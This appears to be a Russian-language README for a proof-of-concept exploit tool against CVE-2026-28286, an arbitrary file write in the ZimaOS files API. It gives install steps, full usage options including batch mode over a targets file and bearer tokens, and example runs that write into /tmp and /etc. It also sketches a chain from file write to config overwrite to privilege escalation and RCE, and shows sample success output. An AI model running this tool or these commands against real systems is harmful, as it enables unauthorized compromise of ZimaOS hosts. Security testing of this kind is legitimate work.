
PoC и набор инструментов для проверки CVE-2026-28286 — уязвимости произвольной записи файлов в ZimaOS, использующей неправильную конфигурацию API для записи файлов за пределами предназначенных каталогов.
От неправильной конфигурации API → Произвольная запись файлов → Возможная компрометация системы
/v2_1/files/filegit clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py
Вы можете просмотреть все доступные опции с помощью:
python poc.py -h
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]
options:
-h, --help показать справочное сообщение и выйти
-u, --url URL URL одиночной цели
-t, --targets TARGETS Файл с целями (пакетный режим)
-p, --path PATH Пользовательский путь к файлу (по умолчанию: /tmp)
--proxy PROXY URL прокси (например, http://127.0.0.1:8080)
--token TOKEN Токен аутентификации Bearer
-n, --attempts Количество попыток
--delay Задержка между пакетными запросами (в секундах)
python poc.py
python poc.py -u http://localhost:8080
python poc.py -u http://localhost:8080 -p /tmp
python poc.py -u http://localhost:8080 -p /etc
python poc.py -u http://localhost:8080 -n 5
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080
python poc.py -t targets.txt
python poc.py -t targets.txt --delay 2
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN
Используйте режим прокси с Burp Suite, чтобы:
Бэкенд не обеспечивает соблюдение границ файловой системы:
Это позволяет записывать в:
/tmp/
/etc/
/usr/local/bin/
Произвольная запись файлов
↓
Перезапись конфигурации / скриптов
↓
Повышение привилегий / RCE

[✔] ПОДТВЕРЖДЕНО уязвимость (LISTING_SUCCESS)
Путь: /tmp/CVE-2026-28286_⚠️_abc123.txt
Если вы нашли это полезным, поставьте звезду ⭐ Это помогает большему числу исследователей обнаружить эту работу.
Только для авторизованного тестирования.